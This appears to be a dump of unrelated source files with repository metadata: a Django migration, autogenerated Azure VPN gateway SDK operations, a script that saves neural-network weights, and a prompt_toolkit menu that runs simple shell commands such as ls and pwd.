    import oops2
    safe(oops2.oops)
| [
"linja1688@gmail.com"
] | linja1688@gmail.com |
5cb5b24b3295a6a98df8c170a567fba75aec2d0a | 2387b5ecf12d9a17976e049e4adbf739edafc830 | /core/migrations/0002_auto_20150511_1223.py | 79c7b2c9754a0743a3a1d31bc73b26c92766009c | [] | no_license | nathananderson03/britdoc | 3ce0b1141a648fce30056ca32fd8665ed6cf4971 | ddb921ed82088abbacdbb625baf3c9cae7987ccb | refs/heads/master | 2021-01-17T06:29:23.812112 | 2016-07-20T16:39:25 | 2016-07-20T16:39:25 | 63,797,054 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 806 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Widen ``Film.production_year`` to year choices 1990-2015 (default 2015)."""

    dependencies = [
        ('core', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='film',
            name='production_year',
            field=models.IntegerField(
                default=2015,
                verbose_name='Year of Completion',
                # Identical (value, label) pairs to the generated literal list.
                choices=[(year, year) for year in range(1990, 2016)],
            ),
        ),
    ]
| [
"nathan.andersson03@gmail.com"
] | nathan.andersson03@gmail.com |
c31c91ed02b3b406ade47cb88de60578a93060eb | c50e7eb190802d7849c0d0cea02fb4d2f0021777 | /src/virtual-wan/azext_vwan/vendored_sdks/v2018_08_01/v2018_08_01/operations/_vpn_gateways_operations.py | f9e506122818fb40211f9df5ce5ae9e5dd697de3 | [
"LicenseRef-scancode-generic-cla",
"MIT"
] | permissive | Azure/azure-cli-extensions | c1615b19930bba7166c282918f166cd40ff6609c | b8c2cf97e991adf0c0a207d810316b8f4686dc29 | refs/heads/main | 2023-08-24T12:40:15.528432 | 2023-08-24T09:17:25 | 2023-08-24T09:17:25 | 106,580,024 | 336 | 1,226 | MIT | 2023-09-14T10:48:57 | 2017-10-11T16:27:31 | Python | UTF-8 | Python | false | false | 30,202 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
    # pylint: disable=unused-import,ungrouped-imports
    from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union

    # Type-checking-only aliases used by the '# type:' comments below.
    # NOTE(review): TypeVar/Optional are imported only under TYPE_CHECKING,
    # so these names must never be referenced at runtime.
    T = TypeVar('T')
    ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class VpnGatewaysOperations(object):
"""VpnGatewaysOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
    def get(
        self,
        resource_group_name,  # type: str
        gateway_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> "_models.VpnGateway"
        """Retrieves the details of a virtual wan vpn gateway.

        :param resource_group_name: The resource group name of the VpnGateway.
        :type resource_group_name: str
        :param gateway_name: The name of the gateway.
        :type gateway_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: VpnGateway, or the result of cls(response)
        :rtype: ~azure.mgmt.network.v2018_08_01.models.VpnGateway
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.VpnGateway"]
        # 401/404/409 are mapped to typed azure-core errors; anything else
        # falls through to the generic HttpResponseError below.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2018-08-01"
        accept = "application/json"

        # Construct URL
        url = self.get.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        # Synchronous pipeline run; the response body is buffered (stream=False).
        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(_models.Error, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        deserialized = self._deserialize('VpnGateway', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    # URL template consumed by the "Construct URL" step above.
    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'}  # type: ignore
    def _create_or_update_initial(
        self,
        resource_group_name,  # type: str
        gateway_name,  # type: str
        vpn_gateway_parameters,  # type: "_models.VpnGateway"
        **kwargs  # type: Any
    ):
        # type: (...) -> "_models.VpnGateway"
        # Issues the initial PUT of the create-or-update long-running
        # operation; begin_create_or_update polls it to completion.
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.VpnGateway"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2018-08-01"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"

        # Construct URL
        url = self._create_or_update_initial.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(vpn_gateway_parameters, 'VpnGateway')
        body_content_kwargs['content'] = body_content
        request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(_models.Error, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        # 200 = updated existing gateway, 201 = created new one; the payload
        # shape is the same either way.
        if response.status_code == 200:
            deserialized = self._deserialize('VpnGateway', pipeline_response)

        if response.status_code == 201:
            deserialized = self._deserialize('VpnGateway', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    _create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'}  # type: ignore
    def begin_create_or_update(
        self,
        resource_group_name,  # type: str
        gateway_name,  # type: str
        vpn_gateway_parameters,  # type: "_models.VpnGateway"
        **kwargs  # type: Any
    ):
        # type: (...) -> LROPoller["_models.VpnGateway"]
        """Creates a virtual wan vpn gateway if it doesn't exist else updates the existing gateway.

        :param resource_group_name: The resource group name of the VpnGateway.
        :type resource_group_name: str
        :param gateway_name: The name of the gateway.
        :type gateway_name: str
        :param vpn_gateway_parameters: Parameters supplied to create or Update a virtual wan vpn
         gateway.
        :type vpn_gateway_parameters: ~azure.mgmt.network.v2018_08_01.models.VpnGateway
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of LROPoller that returns either VpnGateway or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2018_08_01.models.VpnGateway]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.VpnGateway"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        # Only send the initial PUT when starting fresh; with a continuation
        # token the poller resumes from the saved state instead.
        if cont_token is None:
            raw_result = self._create_or_update_initial(
                resource_group_name=resource_group_name,
                gateway_name=gateway_name,
                vpn_gateway_parameters=vpn_gateway_parameters,
                cls=lambda x,y,z: x,
                **kwargs
            )

        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)

        def get_long_running_output(pipeline_response):
            # Final deserialization once the LRO reaches a terminal state.
            deserialized = self._deserialize('VpnGateway', pipeline_response)

            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized

        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
        }

        if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'}  # type: ignore
    def _update_tags_initial(
        self,
        resource_group_name,  # type: str
        gateway_name,  # type: str
        vpn_gateway_parameters,  # type: "_models.TagsObject"
        **kwargs  # type: Any
    ):
        # type: (...) -> "_models.VpnGateway"
        # Issues the initial PATCH of the update-tags long-running operation;
        # begin_update_tags polls it to completion.
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.VpnGateway"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2018-08-01"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"

        # Construct URL
        url = self._update_tags_initial.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        # Only the tags object is sent; other gateway properties are untouched.
        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(vpn_gateway_parameters, 'TagsObject')
        body_content_kwargs['content'] = body_content
        request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(_models.Error, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        if response.status_code == 200:
            deserialized = self._deserialize('VpnGateway', pipeline_response)

        if response.status_code == 201:
            deserialized = self._deserialize('VpnGateway', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    _update_tags_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'}  # type: ignore
    def begin_update_tags(
        self,
        resource_group_name,  # type: str
        gateway_name,  # type: str
        vpn_gateway_parameters,  # type: "_models.TagsObject"
        **kwargs  # type: Any
    ):
        # type: (...) -> LROPoller["_models.VpnGateway"]
        """Updates virtual wan vpn gateway tags.

        :param resource_group_name: The resource group name of the VpnGateway.
        :type resource_group_name: str
        :param gateway_name: The name of the gateway.
        :type gateway_name: str
        :param vpn_gateway_parameters: Parameters supplied to update a virtual wan vpn gateway tags.
        :type vpn_gateway_parameters: ~azure.mgmt.network.v2018_08_01.models.TagsObject
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of LROPoller that returns either VpnGateway or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2018_08_01.models.VpnGateway]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.VpnGateway"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        # Skip the initial PATCH when resuming from a continuation token.
        if cont_token is None:
            raw_result = self._update_tags_initial(
                resource_group_name=resource_group_name,
                gateway_name=gateway_name,
                vpn_gateway_parameters=vpn_gateway_parameters,
                cls=lambda x,y,z: x,
                **kwargs
            )

        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)

        def get_long_running_output(pipeline_response):
            # Final deserialization once the LRO reaches a terminal state.
            deserialized = self._deserialize('VpnGateway', pipeline_response)

            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized

        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
        }

        if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'}  # type: ignore
    def _delete_initial(
        self,
        resource_group_name,  # type: str
        gateway_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> None
        # Issues the initial DELETE of the long-running delete operation;
        # begin_delete polls it to completion. Returns nothing.
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2018-08-01"
        accept = "application/json"

        # Construct URL
        url = self._delete_initial.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.delete(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        # 200/202 = accepted for deletion, 204 = already gone.
        if response.status_code not in [200, 202, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(_models.Error, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        if cls:
            return cls(pipeline_response, None, {})

    _delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'}  # type: ignore
    def begin_delete(
        self,
        resource_group_name,  # type: str
        gateway_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> LROPoller[None]
        """Deletes a virtual wan vpn gateway.

        :param resource_group_name: The resource group name of the VpnGateway.
        :type resource_group_name: str
        :param gateway_name: The name of the gateway.
        :type gateway_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of LROPoller that returns either None or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[None]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True)  # type: Union[bool, PollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        # Skip the initial DELETE when resuming from a continuation token.
        if cont_token is None:
            raw_result = self._delete_initial(
                resource_group_name=resource_group_name,
                gateway_name=gateway_name,
                cls=lambda x,y,z: x,
                **kwargs
            )

        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)

        def get_long_running_output(pipeline_response):
            # Delete produces no body; only invoke the custom callback if given.
            if cls:
                return cls(pipeline_response, None, {})

        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
        }

        if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'}  # type: ignore
    def list_by_resource_group(
        self,
        resource_group_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> Iterable["_models.ListVpnGatewaysResult"]
        """Lists all the VpnGateways in a resource group.

        :param resource_group_name: The resource group name of the VpnGateway.
        :type resource_group_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ListVpnGatewaysResult or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_08_01.models.ListVpnGatewaysResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ListVpnGatewaysResult"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2018-08-01"
        accept = "application/json"

        def prepare_request(next_link=None):
            # First page uses the templated list URL; subsequent pages follow
            # the server-provided nextLink verbatim (it already carries the
            # api-version query parameter).
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

            if not next_link:
                # Construct URL
                url = self.list_by_resource_group.metadata['url']  # type: ignore
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

                request = self._client.get(url, query_parameters, header_parameters)
            else:
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request

        def extract_data(pipeline_response):
            # Returns (next page link or None, iterator over this page's items).
            deserialized = self._deserialize('ListVpnGatewaysResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)

        def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                error = self._deserialize(_models.Error, response)
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

            return pipeline_response

        # ItemPaged lazily fetches pages via get_next/extract_data.
        return ItemPaged(
            get_next, extract_data
        )
    list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways'}  # type: ignore
    def list(
        self,
        **kwargs # type: Any
    ):
        # type: (...) -> Iterable["_models.ListVpnGatewaysResult"]
        """Lists all the VpnGateways in a subscription.
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ListVpnGatewaysResult or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_08_01.models.ListVpnGatewaysResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None) # type: ClsType["_models.ListVpnGatewaysResult"]
        # Map well-known HTTP error codes to azure-core exception types; callers
        # can extend/override the mapping via the 'error_map' keyword.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2018-08-01"
        accept = "application/json"
        def prepare_request(next_link=None):
            # First page: build the templated operation URL plus query string.
            # Subsequent pages: reuse the service-supplied next_link verbatim.
            # Construct headers
            header_parameters = {} # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            if not next_link:
                # Construct URL
                url = self.list.metadata['url'] # type: ignore
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {} # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                url = next_link
                query_parameters = {} # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request
        def extract_data(pipeline_response):
            # Deserialize one page and return (continuation token, item iterator).
            deserialized = self._deserialize('ListVpnGatewaysResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            # Fetch a single page, translating non-200 responses into typed errors.
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                error = self._deserialize(_models.Error, response)
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
            return pipeline_response
        return ItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/vpnGateways'} # type: ignore
| [
"noreply@github.com"
] | Azure.noreply@github.com |
b91811713854a626b904698f64ca3f4bd8e8740d | 2cc483723d7cb9c7a2b145b03e41a564e0c5449a | /app/save_weights.py | 0491cd1aebebbc6630ecd45aef737b48c80335c3 | [] | no_license | MattSegal/QueensSpeech | cb7331860393e30847dd0b4bb7dd9edd77ca3cb0 | cf868bacbaf5b0871dbccc7024ec06857b07aa5c | refs/heads/master | 2021-03-12T20:24:30.281294 | 2017-05-16T12:54:22 | 2017-05-16T12:54:22 | 91,458,300 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 845 | py | import cPickle
import numpy as np
import os.path
def get_name(file):
    """Return the absolute path of *file* inside the 'weights' directory that
    sits next to this script.

    file: bare file name, e.g. '0_weights.arr'.
    """
    base_path = os.path.dirname(os.path.realpath(__file__))
    # os.path.join builds the separator portably instead of hand-concatenating
    # a normpath'd fragment onto base_path.
    return os.path.join(base_path, 'weights', file)
# Load the pickled network, closing the file promptly via a context manager
# (the original left the handle open for the rest of the process).
with open('net.pkl', 'rb') as f:
    net = cPickle.loads(f.read())
# The network is a fixed four-layer stack: parallel input layer, two hidden
# layers, and a softmax output layer.
parallel_layer = net.layers[0]
hidden_layer_1 = net.layers[1]
hidden_layer_2 = net.layers[2]
softmax_layer = net.layers[3]
# Dump each layer's parameters as plain-text arrays under weights/.
np.savetxt(get_name('0_weights.arr'), parallel_layer.layer.weights)
np.savetxt(get_name('1_weights.arr'), hidden_layer_1.weights)
np.savetxt(get_name('2_weights.arr'), hidden_layer_2.weights)
np.savetxt(get_name('3_weights.arr'), softmax_layer.weights)
np.savetxt(get_name('0_bias.arr'), parallel_layer.layer.bias)
np.savetxt(get_name('1_bias.arr'), hidden_layer_1.bias)
np.savetxt(get_name('2_bias.arr'), hidden_layer_2.bias)
np.savetxt(get_name('3_bias.arr'), softmax_layer.bias)
| [
"mattdsegal@gmail.com"
] | mattdsegal@gmail.com |
7329a13090fbf583b35134b78c4ef08362f28dc2 | 2dd3dd778f4f3ef3ca143636a42ce777e948dfc1 | /select_ptk2.py | 4d3d32d4f27ba2275054b5fd74b8458fa5c1c635 | [] | no_license | vaaaaanquish-xx/select-command-using-ptk | 64aea38b9b686c024a624baf2064cfe9f1cea255 | 07b6c7baddff15e8838a6b9b9a4b314450a9f1f9 | refs/heads/master | 2020-04-07T16:08:55.648027 | 2018-11-22T15:03:23 | 2018-11-22T15:03:23 | 158,517,117 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,009 | py | # -*- coding: utf-8 -*-
# ptk 2.x ver
from prompt_toolkit.application import Application
from prompt_toolkit.layout.margins import ScrollbarMargin
from prompt_toolkit.filters import IsDone
from prompt_toolkit.key_binding import KeyBindings
from prompt_toolkit.layout.containers import Window
from prompt_toolkit.layout.containers import ConditionalContainer
from prompt_toolkit.layout.containers import ScrollOffsets
from prompt_toolkit.layout.containers import HSplit
from prompt_toolkit.layout.controls import FormattedTextControl
from prompt_toolkit.layout.dimension import LayoutDimension as D
from prompt_toolkit.layout.layout import Layout
from prompt_toolkit.mouse_events import MouseEventType
from prompt_toolkit.styles import Style
from prompt_toolkit.styles import pygments_token_to_classname
from prompt_toolkit.styles.pygments import style_from_pygments_dict
from pygments.token import Token
import subprocess
choices = ['ls', 'ifconfig', 'pwd', 'who']
string_query = ' Command Select '
inst = ' (Use arrow keys)'
def selected_item(text):
    """Run the chosen command and print its exit status."""
    exit_status = subprocess.call(text)
    print(exit_status)
class InquirerControl(FormattedTextControl):
    """Formatted-text control that renders the selectable command list.

    Tracks which choice is highlighted (selected_option_index) and whether the
    user has confirmed a choice (answered); the key bindings below mutate that
    state.
    """
    selected_option_index = 0
    answered = False
    def __init__(self, choices, **kwargs):
        self.choices = choices
        super(InquirerControl, self).__init__(self._get_choice_tokens, **kwargs)
    @property
    def choice_count(self):
        """Number of selectable choices."""
        return len(self.choices)
    def _get_choice_tokens(self):
        """Build the (style, text[, handler]) fragments for the choice list.

        The highlighted row gets the Selected style, a ' > ' marker and the
        cursor position; every row carries a mouse handler that both selects
        and confirms the clicked entry.
        """
        tokens = []
        T = Token
        def append(index, label):
            selected = (index == self.selected_option_index)
            def select_item(app, mouse_event):
                # NOTE(review): prompt_toolkit 2.x passes only the mouse event
                # to fragment handlers; the extra 'app' parameter here looks
                # suspect — confirm before relying on mouse clicks.
                self.selected_option_index = index
                self.answered = True
            # (Removed a dead `token = T.Selected if selected else T` local:
            # it was assigned but never read.)
            tokens.append((T.Selected if selected else T, ' > ' if selected else '   '))
            if selected:
                tokens.append((Token.SetCursorPosition, ''))
            tokens.append((T.Selected if selected else T, '%-24s' % label, select_item))
            tokens.append((T, '\n'))
        for i, choice in enumerate(self.choices):
            append(i, choice)
